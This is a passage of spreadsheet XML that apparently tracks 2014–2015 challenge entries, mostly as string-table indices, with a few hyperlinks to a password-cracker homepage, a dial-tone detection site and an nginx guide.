      <c r="F91" s="35" t="s">
        <v>2773</v>
      </c>
      <c r="G91" s="30" t="s">
        <v>2774</v>
      </c>
      <c r="H91" s="30" t="s">
        <v>2775</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B92" s="31">
        <v>2014.0</v>
      </c>
      <c r="C92" s="30" t="s">
        <v>2777</v>
      </c>
      <c r="D92" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E92" s="30" t="s">
        <v>2779</v>
      </c>
      <c r="F92" s="35" t="s">
        <v>2780</v>
      </c>
      <c r="G92" s="30" t="s">
        <v>2781</v>
      </c>
      <c r="H92" s="30" t="s">
        <v>2782</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B93" s="31">
        <v>2014.0</v>
      </c>
      <c r="C93" s="30" t="s">
        <v>2783</v>
      </c>
      <c r="D93" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E93" s="30" t="s">
        <v>2641</v>
      </c>
      <c r="F93" s="35" t="s">
        <v>2784</v>
      </c>
      <c r="G93" s="161" t="s">
        <v>2785</v>
      </c>
      <c r="H93" s="30" t="s">
        <v>2793</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B94" s="31">
        <v>2014.0</v>
      </c>
      <c r="C94" s="30" t="s">
        <v>2796</v>
      </c>
      <c r="D94" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E94" s="30" t="s">
        <v>2798</v>
      </c>
      <c r="F94" s="30" t="s">
        <v>2800</v>
      </c>
      <c r="G94" s="30" t="s">
        <v>2801</v>
      </c>
      <c r="H94" s="30" t="s">
        <v>2804</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B95" s="31">
        <v>2014.0</v>
      </c>
      <c r="C95" s="30" t="s">
        <v>2807</v>
      </c>
      <c r="D95" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E95" s="30" t="s">
        <v>2658</v>
      </c>
      <c r="F95" s="30" t="s">
        <v>2809</v>
      </c>
      <c r="G95" s="30" t="s">
        <v>2809</v>
      </c>
      <c r="H95" s="30" t="s">
        <v>2810</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B96" s="31">
        <v>2014.0</v>
      </c>
      <c r="C96" s="30" t="s">
        <v>2813</v>
      </c>
      <c r="D96" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E96" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F96" s="35" t="s">
        <v>2815</v>
      </c>
      <c r="G96" s="30" t="s">
        <v>2818</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B97" s="31">
        <v>2014.0</v>
      </c>
      <c r="C97" s="30" t="s">
        <v>2821</v>
      </c>
      <c r="D97" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E97" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F97" s="35" t="s">
        <v>2815</v>
      </c>
      <c r="G97" s="30" t="s">
        <v>2822</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B98" s="31">
        <v>2014.0</v>
      </c>
      <c r="C98" s="30" t="s">
        <v>2823</v>
      </c>
      <c r="D98" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E98" s="30" t="s">
        <v>2824</v>
      </c>
      <c r="F98" s="35" t="s">
        <v>2825</v>
      </c>
      <c r="G98" s="30" t="s">
        <v>2826</v>
      </c>
      <c r="H98" s="30" t="s">
        <v>2827</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B99" s="31">
        <v>2014.0</v>
      </c>
      <c r="C99" s="30" t="s">
        <v>2829</v>
      </c>
      <c r="D99" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E99" s="30" t="s">
        <v>2830</v>
      </c>
      <c r="F99" s="35" t="s">
        <v>2831</v>
      </c>
      <c r="G99" s="30" t="s">
        <v>2832</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B100" s="31">
        <v>2014.0</v>
      </c>
      <c r="C100" s="30" t="s">
        <v>2834</v>
      </c>
      <c r="D100" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E100" s="30" t="s">
        <v>51</v>
      </c>
      <c r="F100" s="35" t="s">
        <v>2835</v>
      </c>
      <c r="G100" s="30" t="s">
        <v>2836</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B101" s="31">
        <v>2014.0</v>
      </c>
      <c r="C101" s="30" t="s">
        <v>2837</v>
      </c>
      <c r="D101" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E101" s="30" t="s">
        <v>2839</v>
      </c>
      <c r="F101" s="35" t="s">
        <v>2840</v>
      </c>
      <c r="G101" s="30" t="s">
        <v>2841</v>
      </c>
      <c r="H101" s="30" t="s">
        <v>446</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B102" s="31">
        <v>2014.0</v>
      </c>
      <c r="C102" s="30" t="s">
        <v>2842</v>
      </c>
      <c r="D102" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E102" s="30" t="s">
        <v>2843</v>
      </c>
      <c r="F102" s="35" t="s">
        <v>2844</v>
      </c>
      <c r="G102" s="30" t="s">
        <v>2845</v>
      </c>
      <c r="H102" s="33" t="str">
        <f>HYPERLINK("http://www.openwall.com/john/","JTR Password cracker")</f>
        <v>JTR Password cracker</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B103" s="31">
        <v>2014.0</v>
      </c>
      <c r="C103" s="30" t="s">
        <v>2856</v>
      </c>
      <c r="D103" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E103" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F103" s="35" t="s">
        <v>2857</v>
      </c>
      <c r="G103" s="30" t="s">
        <v>2858</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B104" s="31">
        <v>2014.0</v>
      </c>
      <c r="C104" s="30" t="s">
        <v>2859</v>
      </c>
      <c r="D104" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E104" s="30" t="s">
        <v>2860</v>
      </c>
      <c r="F104" s="35" t="s">
        <v>2861</v>
      </c>
      <c r="G104" s="30" t="s">
        <v>2862</v>
      </c>
      <c r="H104" s="129" t="s">
        <v>2863</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="40" t="s">
        <v>638</v>
      </c>
      <c r="B105" s="40">
        <v>2014.0</v>
      </c>
      <c r="C105" s="40" t="s">
        <v>2866</v>
      </c>
      <c r="D105" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E105" s="40" t="s">
        <v>1222</v>
      </c>
      <c r="F105" s="40" t="s">
        <v>2868</v>
      </c>
      <c r="G105" s="40" t="s">
        <v>2870</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B106" s="40">
        <v>2014.0</v>
      </c>
      <c r="C106" s="40" t="s">
        <v>2872</v>
      </c>
      <c r="D106" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E106" s="40" t="s">
        <v>71</v>
      </c>
      <c r="F106" s="40" t="s">
        <v>2873</v>
      </c>
      <c r="G106" s="40" t="s">
        <v>2874</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="40" t="s">
        <v>1227</v>
      </c>
      <c r="B107" s="40">
        <v>2016.0</v>
      </c>
      <c r="C107" s="40" t="s">
        <v>2875</v>
      </c>
      <c r="D107" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E107" s="40" t="s">
        <v>2658</v>
      </c>
      <c r="F107" s="40" t="s">
        <v>2876</v>
      </c>
      <c r="G107" s="40" t="s">
        <v>2877</v>
      </c>
      <c r="H107" s="58" t="str">
        <f>HYPERLINK("http://dialabc.com/sound/detect/","Extract dialtones")</f>
        <v>Extract dialtones</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="17">
        <v>42528.0</v>
      </c>
      <c r="B108" s="7"/>
      <c r="C108" s="6"/>
      <c r="D108" s="6"/>
      <c r="E108" s="6"/>
      <c r="F108" s="6"/>
      <c r="G108" s="6"/>
      <c r="H108" s="6"/>
      <c r="I108" s="8"/>
      <c r="J108" s="8"/>
      <c r="K108" s="9"/>
      <c r="L108" s="9"/>
      <c r="M108" s="9"/>
      <c r="N108" s="9"/>
      <c r="O108" s="9"/>
      <c r="P108" s="9"/>
      <c r="Q108" s="9"/>
      <c r="R108" s="9"/>
      <c r="S108" s="9"/>
      <c r="T108" s="9"/>
      <c r="U108" s="9"/>
      <c r="V108" s="9"/>
      <c r="W108" s="9"/>
      <c r="X108" s="9"/>
      <c r="Y108" s="9"/>
      <c r="Z108" s="9"/>
    </row>
    <row r="109">
      <c r="A109" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B109" s="31">
        <v>2014.0</v>
      </c>
      <c r="C109" s="30" t="s">
        <v>2886</v>
      </c>
      <c r="D109" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E109" s="32"/>
      <c r="F109" s="30" t="s">
        <v>2887</v>
      </c>
      <c r="G109" s="30" t="s">
        <v>2888</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="30" t="s">
        <v>648</v>
      </c>
      <c r="B110" s="31">
        <v>2014.0</v>
      </c>
      <c r="C110" s="30" t="s">
        <v>2890</v>
      </c>
      <c r="D110" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E110" s="30" t="s">
        <v>2891</v>
      </c>
      <c r="F110" s="30" t="s">
        <v>2892</v>
      </c>
      <c r="G110" s="30" t="s">
        <v>2585</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="30" t="s">
        <v>1245</v>
      </c>
      <c r="B111" s="31">
        <v>2014.0</v>
      </c>
      <c r="C111" s="30" t="s">
        <v>2893</v>
      </c>
      <c r="D111" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E111" s="30" t="s">
        <v>2894</v>
      </c>
      <c r="F111" s="35" t="s">
        <v>2895</v>
      </c>
      <c r="G111" s="30" t="s">
        <v>2896</v>
      </c>
      <c r="H111" s="109" t="s">
        <v>2897</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="30" t="s">
        <v>654</v>
      </c>
      <c r="B112" s="31">
        <v>2014.0</v>
      </c>
      <c r="C112" s="30" t="s">
        <v>2898</v>
      </c>
      <c r="D112" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E112" s="30" t="s">
        <v>2899</v>
      </c>
      <c r="F112" s="30" t="s">
        <v>2900</v>
      </c>
      <c r="G112" s="30" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="40" t="s">
        <v>638</v>
      </c>
      <c r="B113" s="40">
        <v>2014.0</v>
      </c>
      <c r="C113" s="52" t="s">
        <v>2903</v>
      </c>
      <c r="D113" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F113" s="40" t="s">
        <v>2904</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B114" s="31">
        <v>2014.0</v>
      </c>
      <c r="C114" s="30" t="s">
        <v>2908</v>
      </c>
      <c r="D114" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E114" s="162" t="s">
        <v>1570</v>
      </c>
      <c r="F114" s="35" t="s">
        <v>2915</v>
      </c>
      <c r="G114" s="33" t="s">
        <v>2916</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B115" s="40">
        <v>2014.0</v>
      </c>
      <c r="C115" s="40" t="s">
        <v>2919</v>
      </c>
      <c r="D115" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E115" s="40" t="s">
        <v>2249</v>
      </c>
      <c r="F115" s="40" t="s">
        <v>2921</v>
      </c>
      <c r="G115" s="40" t="s">
        <v>2922</v>
      </c>
      <c r="H115" s="40" t="s">
        <v>2923</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="40" t="s">
        <v>662</v>
      </c>
      <c r="B116" s="40">
        <v>2014.0</v>
      </c>
      <c r="C116" s="40" t="s">
        <v>2924</v>
      </c>
      <c r="D116" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E116" s="40" t="s">
        <v>2926</v>
      </c>
      <c r="F116" s="40" t="s">
        <v>2927</v>
      </c>
      <c r="G116" s="40" t="s">
        <v>2929</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B117" s="40">
        <v>2014.0</v>
      </c>
      <c r="C117" s="40" t="s">
        <v>2931</v>
      </c>
      <c r="D117" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E117" s="40" t="s">
        <v>2932</v>
      </c>
      <c r="F117" s="40" t="s">
        <v>584</v>
      </c>
      <c r="G117" s="40" t="s">
        <v>2933</v>
      </c>
      <c r="H117" s="40" t="s">
        <v>2934</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B118" s="40">
        <v>2014.0</v>
      </c>
      <c r="C118" s="40" t="s">
        <v>2935</v>
      </c>
      <c r="D118" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E118" s="40" t="s">
        <v>2936</v>
      </c>
      <c r="F118" s="40" t="s">
        <v>2937</v>
      </c>
      <c r="G118" s="40" t="s">
        <v>2938</v>
      </c>
      <c r="H118" s="40" t="s">
        <v>2939</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B119" s="40">
        <v>2014.0</v>
      </c>
      <c r="C119" s="40" t="s">
        <v>2942</v>
      </c>
      <c r="D119" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E119" s="40" t="s">
        <v>2290</v>
      </c>
      <c r="F119" s="40" t="s">
        <v>2946</v>
      </c>
      <c r="G119" s="40" t="s">
        <v>2948</v>
      </c>
      <c r="H119" s="40" t="s">
        <v>2949</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B120" s="43">
        <v>2015.0</v>
      </c>
      <c r="C120" s="5" t="s">
        <v>2950</v>
      </c>
      <c r="D120" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E120" s="5" t="s">
        <v>2951</v>
      </c>
      <c r="F120" s="5" t="s">
        <v>2953</v>
      </c>
      <c r="G120" s="5" t="s">
        <v>682</v>
      </c>
      <c r="H120" s="5" t="s">
        <v>2954</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B121" s="43">
        <v>2015.0</v>
      </c>
      <c r="C121" s="5" t="s">
        <v>2955</v>
      </c>
      <c r="D121" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E121" s="3"/>
      <c r="F121" s="5" t="s">
        <v>2957</v>
      </c>
      <c r="G121" s="5" t="s">
        <v>2958</v>
      </c>
      <c r="H121" s="3"/>
    </row>
    <row r="122">
      <c r="A122" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B122" s="43">
        <v>2015.0</v>
      </c>
      <c r="C122" s="5" t="s">
        <v>2961</v>
      </c>
      <c r="D122" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E122" s="5" t="s">
        <v>2962</v>
      </c>
      <c r="F122" s="5" t="s">
        <v>2963</v>
      </c>
      <c r="G122" s="5" t="s">
        <v>682</v>
      </c>
      <c r="H122" s="5" t="s">
        <v>2964</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B123" s="40">
        <v>2014.0</v>
      </c>
      <c r="C123" s="40" t="s">
        <v>2965</v>
      </c>
      <c r="D123" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E123" s="40" t="s">
        <v>2966</v>
      </c>
      <c r="F123" s="40" t="s">
        <v>2967</v>
      </c>
      <c r="G123" s="40" t="s">
        <v>2972</v>
      </c>
      <c r="H123" s="166" t="s">
        <v>2973</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B124" s="40">
        <v>2014.0</v>
      </c>
      <c r="C124" s="40" t="s">
        <v>2981</v>
      </c>
      <c r="D124" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E124" s="110"/>
      <c r="F124" s="40" t="s">
        <v>2983</v>
      </c>
      <c r="G124" s="40" t="s">
        <v>2985</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B125" s="40">
        <v>2014.0</v>
      </c>
      <c r="C125" s="40" t="s">
        <v>2989</v>
      </c>
      <c r="D125" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F125" s="40" t="s">
        <v>2990</v>
      </c>
      <c r="G125" s="40" t="s">
        <v>2991</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B126" s="40">
        <v>2014.0</v>
      </c>
      <c r="C126" s="40" t="s">
        <v>2994</v>
      </c>
      <c r="D126" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E126" s="110"/>
      <c r="F126" s="40" t="s">
        <v>2997</v>
      </c>
      <c r="G126" s="40" t="s">
        <v>2998</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B127" s="40">
        <v>2014.0</v>
      </c>
      <c r="C127" s="40" t="s">
        <v>2994</v>
      </c>
      <c r="D127" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E127" s="110"/>
      <c r="F127" s="40" t="s">
        <v>2999</v>
      </c>
      <c r="G127" s="40" t="s">
        <v>3000</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B128" s="40">
        <v>2014.0</v>
      </c>
      <c r="C128" s="40" t="s">
        <v>3002</v>
      </c>
      <c r="D128" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E128" s="40" t="s">
        <v>2663</v>
      </c>
      <c r="F128" s="40" t="s">
        <v>3003</v>
      </c>
      <c r="G128" s="40" t="s">
        <v>3004</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="17">
        <v>42535.0</v>
      </c>
      <c r="B129" s="7"/>
      <c r="C129" s="6"/>
      <c r="D129" s="6"/>
      <c r="E129" s="6"/>
      <c r="F129" s="6"/>
      <c r="G129" s="6"/>
      <c r="H129" s="6"/>
      <c r="I129" s="8"/>
      <c r="J129" s="8"/>
      <c r="K129" s="9"/>
      <c r="L129" s="9"/>
      <c r="M129" s="9"/>
      <c r="N129" s="9"/>
      <c r="O129" s="9"/>
      <c r="P129" s="9"/>
      <c r="Q129" s="9"/>
      <c r="R129" s="9"/>
      <c r="S129" s="9"/>
      <c r="T129" s="9"/>
      <c r="U129" s="9"/>
      <c r="V129" s="9"/>
      <c r="W129" s="9"/>
      <c r="X129" s="9"/>
      <c r="Y129" s="9"/>
      <c r="Z129" s="9"/>
    </row>
    <row r="130">
      <c r="A130" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B130" s="31">
        <v>2015.0</v>
      </c>
      <c r="C130" s="30" t="s">
        <v>3012</v>
      </c>
      <c r="D130" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E130" s="30" t="s">
        <v>3014</v>
      </c>
      <c r="F130" s="167" t="s">
        <v>3017</v>
      </c>
      <c r="G130" s="30" t="s">
        <v>3028</v>
      </c>
      <c r="H130" s="30" t="s">
        <v>3029</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B131" s="31">
        <v>2014.0</v>
      </c>
      <c r="C131" s="30" t="s">
        <v>3031</v>
      </c>
      <c r="D131" s="30" t="s">
        <v>1363</v>
      </c>
      <c r="E131" s="30" t="s">
        <v>3032</v>
      </c>
      <c r="F131" s="35" t="s">
        <v>3033</v>
      </c>
      <c r="G131" s="35" t="s">
        <v>3034</v>
      </c>
      <c r="H131" s="30" t="s">
        <v>2897</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B132" s="31">
        <v>2014.0</v>
      </c>
      <c r="C132" s="30" t="s">
        <v>3036</v>
      </c>
      <c r="D132" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E132" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F132" s="35" t="s">
        <v>3038</v>
      </c>
      <c r="G132" s="35" t="s">
        <v>3039</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B133" s="31">
        <v>2014.0</v>
      </c>
      <c r="C133" s="30" t="s">
        <v>3042</v>
      </c>
      <c r="D133" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E133" s="30" t="s">
        <v>3044</v>
      </c>
      <c r="F133" s="35" t="s">
        <v>3045</v>
      </c>
      <c r="G133" s="35" t="s">
        <v>3047</v>
      </c>
      <c r="H133" s="30" t="s">
        <v>3050</v>
      </c>
      <c r="I133" s="30"/>
      <c r="J133" s="30"/>
    </row>
    <row r="134">
      <c r="A134" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B134" s="31">
        <v>2014.0</v>
      </c>
      <c r="C134" s="30" t="s">
        <v>3052</v>
      </c>
      <c r="D134" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E134" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F134" s="35" t="s">
        <v>3054</v>
      </c>
      <c r="G134" s="35" t="s">
        <v>3055</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B135" s="31">
        <v>2014.0</v>
      </c>
      <c r="C135" s="30" t="s">
        <v>3057</v>
      </c>
      <c r="D135" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E135" s="32" t="s">
        <v>3058</v>
      </c>
      <c r="F135" s="35" t="s">
        <v>3060</v>
      </c>
      <c r="G135" s="35" t="s">
        <v>3063</v>
      </c>
      <c r="H135" s="30" t="s">
        <v>3064</v>
      </c>
      <c r="I135" s="33" t="s">
        <v>3065</v>
      </c>
      <c r="J135" s="33" t="s">
        <v>3069</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B136" s="31">
        <v>2014.0</v>
      </c>
      <c r="C136" s="30" t="s">
        <v>3072</v>
      </c>
      <c r="D136" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E136" s="30" t="s">
        <v>3073</v>
      </c>
      <c r="F136" s="35" t="s">
        <v>479</v>
      </c>
      <c r="G136" s="35" t="s">
        <v>3074</v>
      </c>
      <c r="H136" s="33" t="str">
        <f>HYPERLINK("http://nginx.org/en/docs/beginners_guide.html","ngix conf file")</f>
        <v>ngix conf file</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="60" t="s">
        <v>701</v>
      </c>
      <c r="B137" s="43">
        <v>2015.0</v>
      </c>
      <c r="C137" s="5" t="s">
        <v>3075</v>
      </c>
      <c r="D137" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E137" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F137" s="5" t="s">
        <v>3076</v>
      </c>
      <c r="G137" s="5" t="s">
        <v>682</v>
      </c>
      <c r="H137" s="3"/>
    </row>
    <row r="138" ht="17.25" customHeight="1">
      <c r="A138" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B138" s="43">
        <v>2015.0</v>
      </c>
      <c r="C138" s="5" t="s">
        <v>3077</v>
      </c>
      <c r="D138" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E138" s="5" t="s">
        <v>3078</v>
      </c>
      <c r="F138" s="5" t="s">
        <v>3079</v>
      </c>
      <c r="G138" s="5" t="s">
        <v>3080</v>
      </c>
      <c r="H138" s="5" t="s">
        <v>3081</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B139" s="40">
        <v>2014.0</v>
      </c>
      <c r="C139" s="40" t="s">
        <v>3082</v>
      </c>
      <c r="D139" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E139" s="40" t="s">
        <v>2693</v>
      </c>
      <c r="F139" s="40" t="s">
        <v>3083</v>
      </c>
      <c r="G139" s="40" t="s">
        <v>3084</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B140" s="43">
        <v>2015.0</v>
      </c>
      <c r="C140" s="5" t="s">
        <v>3085</v>
      </c>
      <c r="D140" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E140" s="5" t="s">
        <v>51</v>
      </c>
      <c r="F140" s="5" t="s">
        <v>3086</v>
      </c>
      <c r="G140" s="5" t="s">
        <v>3087</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B141" s="43">
        <v>2015.0</v>
      </c>
      <c r="C141" s="5" t="s">
        <v>208</v>
      </c>
      <c r="D141" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E141" s="3"/>
      <c r="F141" s="5" t="s">
        <v>3088</v>
      </c>
      <c r="G141" s="5" t="s">
        <v>682</v>
      </c>
      <c r="H141" s="5" t="s">
        <v>3089</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="17">
        <v>42538.0</v>
      </c>
      <c r="B142" s="7"/>
      <c r="C142" s="6"/>
      <c r="D142" s="6"/>
      <c r="E142" s="6"/>
      <c r="F142" s="6"/>
      <c r="G142" s="6"/>
      <c r="H142" s="6"/>
      <c r="I142" s="8"/>
      <c r="J142" s="8"/>
      <c r="K142" s="9"/>
      <c r="L142" s="9"/>
      <c r="M142" s="9"/>
      <c r="N142" s="9"/>
      <c r="O142" s="9"/>
      <c r="P142" s="9"/>
      <c r="Q142" s="9"/>
      <c r="R142" s="9"/>
      <c r="S142" s="9"/>
      <c r="T142" s="9"/>
      <c r="U142" s="9"/>
      <c r="V142" s="9"/>
      <c r="W142" s="9"/>
      <c r="X142" s="9"/>
      <c r="Y142" s="9"/>
      <c r="Z142" s="9"/>
    </row>
    <row r="143">
      <c r="A143" s="37">
        <v>9447.0</v>
      </c>
      <c r="B143" s="40">
        <v>2015.0</v>
      </c>
      <c r="C143" s="40" t="s">
        <v>3090</v>
      </c>
      <c r="D143" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E143" s="110"/>
      <c r="F143" s="40" t="s">
        <v>3091</v>
      </c>
      <c r="G143" s="40" t="s">
        <v>3092</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="s">
        <v>1635</v>
      </c>
      <c r="B144" s="43">
        <v>2015.0</v>
      </c>
      <c r="C144" s="5" t="s">
        <v>3093</v>
      </c>
      <c r="D144" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E144" s="5" t="s">
        <v>2370</v>
      </c>
      <c r="F144" s="5" t="s">
        <v>3094</v>
      </c>
      <c r="G144" s="5" t="s">
        <v>3095</v>
      </c>
      <c r="H144" s="56" t="s">
        <v>3096</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="s">
        <v>1635</v>
      </c>
      <c r="B145" s="43">
        <v>2015.0</v>
      </c>
      <c r="C145" s="5" t="s">
        <v>3097</v>
      </c>
      <c r="D145" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E145" s="5" t="s">
        <v>3098</v>
      </c>
      <c r="F145" s="5" t="s">
        <v>3099</v>
      </c>
      <c r="G145" s="5" t="s">
        <v>3100</v>
      </c>
      <c r="H145" s="5" t="s">
        <v>3101</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="s">
        <v>1635</v>
      </c>
      <c r="B146" s="43">
        <v>2015.0</v>
      </c>
      <c r="C146" s="5" t="s">
        <v>3102</v>
      </c>
      <c r="D146" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E146" s="5" t="s">
        <v>2951</v>
      </c>
      <c r="F146" s="5" t="s">
        <v>3103</v>
      </c>
      <c r="G146" s="5" t="s">
        <v>3104</v>
      </c>
      <c r="H146" s="5" t="s">
        <v>3105</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="37">
        <v>9447.0</v>
      </c>
      <c r="B147" s="40">
        <v>2015.0</v>
      </c>
      <c r="C147" s="40" t="s">
        <v>3106</v>
      </c>
      <c r="D147" s="40" t="s">
        <v>23</v>
      </c>
      <c r="F147" s="40" t="s">
        <v>3107</v>
      </c>
      <c r="G147" s="40" t="s">
        <v>3108</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="17">
        <v>42542.0</v>
      </c>
      <c r="B148" s="65"/>
      <c r="C148" s="65"/>
      <c r="D148" s="65"/>
      <c r="E148" s="9"/>
      <c r="F148" s="65"/>
      <c r="G148" s="65"/>
      <c r="H148" s="66"/>
      <c r="I148" s="9"/>
      <c r="J148" s="9"/>
      <c r="K148" s="9"/>
      <c r="L148" s="9"/>
      <c r="M148" s="9"/>
      <c r="N148" s="9"/>
      <c r="O148" s="9"/>
      <c r="P148" s="9"/>
      <c r="Q148" s="9"/>
      <c r="R148" s="9"/>
      <c r="S148" s="9"/>
      <c r="T148" s="9"/>
      <c r="U148" s="9"/>
      <c r="V148" s="9"/>
      <c r="W148" s="9"/>
      <c r="X148" s="9"/>
      <c r="Y148" s="9"/>
